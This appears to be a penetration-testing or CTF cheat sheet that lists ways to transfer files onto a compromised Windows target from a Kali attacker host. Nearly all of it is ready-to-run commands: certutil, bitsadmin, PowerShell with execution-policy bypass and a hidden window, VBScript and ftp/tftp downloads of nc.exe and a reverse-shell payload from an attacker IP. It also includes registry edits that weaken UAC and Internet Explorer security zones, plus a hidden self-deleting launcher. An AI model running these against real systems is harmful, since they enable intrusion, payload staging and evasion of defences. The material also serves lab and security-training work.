Transfer Files - Windows

Replace 20.20.20.20 with Kali attacker
Replace 10.10.10.10 with Linux target

Copy files using smbclient
In Windows run cmd.exe as administrator or use a UAC bypass exploit:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1

From Kali, use smbclient to list share names and connect to share:

root@kali:~/ctf# smbclient -L 10.10.10.10 -U username%password

From Kali, use smbclient to connect to share:

root@kali:~/ctf# smbclient \\\\10.10.10.10\\SomeShare -U username%password
Copy files using mount
In Windows run cmd.exe as administrator or use a UAC bypass exploit:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1

From Kali, connect using mount:

mkdir /media/cifs
mount -t cifs //10.10.10.10/c$ -o username=username,password=password,domain=10.10.10.10 /media/cifs
Copy files via Windows VBScript (.vbs)

Tested on WIN7-SP0: On the Windows machine, create the file wget.vbs:

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

On the Windows machine, run the wget.vbs to download a file:

cscript wget.vbs http://ATTACKER_IP/putty.exe putty.exe
Copy files via Windows PowerShell

Compatibility: WIN7 SP0+

powershell.exe -noninteractive -ExecutionPolicy Bypass -NoLogo -NoProfile (new-object System.Net.WebClient).DownloadFile('http://10.1.1.199/jollyfrogs_443_mtpr__rev_https_x64.exe','jollyfrogs_443_mtpr__rev_https_x64.exe')
powershell.exe -noninteractive -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile (new-object System.Net.WebClient).DownloadFile('http://192.168.14.84/putty.exe','%TEMP%\putty.exe')
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source="""http://10.1.1.110/putty.exe"""; $destination="""%TEMP%\putty.exe"""; $http=new-object System.Net.WebClient; $response=$http.DownloadFile($source,$destination);"
(for %t in ("$storageDir = $pwd" "$webclient = New-Object System.Net.WebClient" "$url = "http://10.1.1.110/putty.exe"" "$file = "putty.exe"" "$webclient.DownloadFile($url,$file)") do @echo %~t) >wget.ps1 && powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Copy files via Windows BITSadmin

Compatibility: WIN7 SP0+
Requires a web server on 20.20.20.20 that supports the "range protocol" header

bitsadmin /transfer job1 /download /priority high http://20.20.20.20/putty.exe %TEMP%\putty.exe
Copy files via Windows TFTP
Compatibility: VISTA SP0+, WIN7 SP0+, WIN2008 SP0+, WIN10 SP0+

On Kali start a TFTP listener

 mkdir /root/tftp && atftpd --daemon --port 69 /root/tftp
cp /usr/share/windows-binaries/nc.exe /root/tftp

On Windows install TFTP client

pkgmgr /iu:"TFTP"

Wait for 30 seconds while target installs the TFTP client, then run:

tftp -i 20.20.20.20 GET nc.exe
Copy files via Windows FTP
Compatibility: VISTA SP0+, WIN7 SP0+, WIN2008 SP0+, WIN10 SP0+

On Kali, install pure-ftpd:

apt-get update && apt-get install pure-ftpd
groupadd ftpgroup && useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd username -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/ && ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome && chown -R ftpuser:ftpgroup /ftphome/
cp /usr/share/windows-binaries/nc.exe /ftphome && /etc/init.d/pure-ftpd restart

On Windows, transfer the file:

set r=^&echo:&&(echo open 20.20.20.20 21%r%ftp%r%bin%r%GET nc.exe%r%bye) > ftp.txt&&ftp -s:ftp.txt

or

(for %t in ("open 20.20.20.20 21" ftp bin "GET nc.exe" bye) do @echo %~t) >ftp.txt&&ftp -s:ftp.txt
Copy files inline via Windows debug.exe
64k file size limit - nc.exe will crash when copy/pasting over 64k
Compatibility: WINXP, WIN2000
Note: Only works in 32-bit (x86). Does not work with newer versions of Windows.
On Kali, convert the file using exe2hex:

exe2hex -x /usr/share/windows-binaries/nc.exe -b /var/www/html/nc_debug.txt -cc

copy contents of nc.txt to clipboard and paste via a remote shell, it will use debug.exe to reconstruct the .exe

Copy files via certutil

Compatibility: WINXP+

On Kali, start a simple webserver on port 9999 to serve contents of /usr/share/windows-binaries/:

php -S 0.0.0.0:9999 -t /usr/share/windows-binaries

On Windows:

certutil.exe -urlcache -split -f http://20.20.20.20:9999/nc.exe %TEMP%\nc.exe
Copy files inline via Windows PowerShell
64k file size limit - nc.exe will crash when copy/pasting over 64k
Compatibility: WIN7+, WIN2008R2+
On Kali, convert the file using exe2hex:

exe2hex -x /usr/share/windows-binaries/nc.exe -p /var/www/html/nc_powershell.txt -cc

copy contents of nc.txt to clipboard and paste via a remote shell, it will use PowerShell.exe to reconstruct the .exe
Note: This works on x86 and x64 on any Windows distribution with PowerShell (WIN7+,WIN2K8+)

Copy files using Internet Explorer
Compatibility: WINXP, WIN2000

On Windows, add attacker IP to Internet Explorer's Intranet security zone

reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\randomname" /v ":Range" /d "20.20.20.20"
reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\randomname" /v "*" /t REG_DWORD /d 1

On Windows, configure the Intranet zone to auto-load PassivEx:

reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1001" /t REG_DWORD /d 0
reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1004" /t REG_DWORD /d 0
reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1200" /t REG_DWORD /d 0
reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1201" /t REG_DWORD /d 0
reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1208" /t REG_DWORD /d 0

On Windows target, create a VBscript to invisibly launch internet explorer pointed to our webserver:

echo CreateObject("Wscript.Shell").Run "iexplore.exe -new http://20.20.20.20:9999/nc.exe", 0, False > temp.vbs

Run the vbscript and clean up (delete) temp.vbs:

wscript temp.vbs && del temp.vbs
Copy files via Python

Note: Only works if Python is installed in Windows (not default)

On Kali, start a simple webserver on port 9999 to serve contents of /usr/share/windows-binaries/:

php -S 0.0.0.0:9999 -t /usr/share/windows-binaries

On Windows, if using Python 2:

python -c "import urllib; urllib.urlretrieve ('http://20.20.20.20:9999/nc_powershell.txt', r'%TEMP%\ps.txt')"

On Windows, if using Python 3:

python -c "import urllib.request; urllib.request.urlretrieve ('http://20.20.20.20:9999/nc.exe', r'%TEMP%\nc.exe')"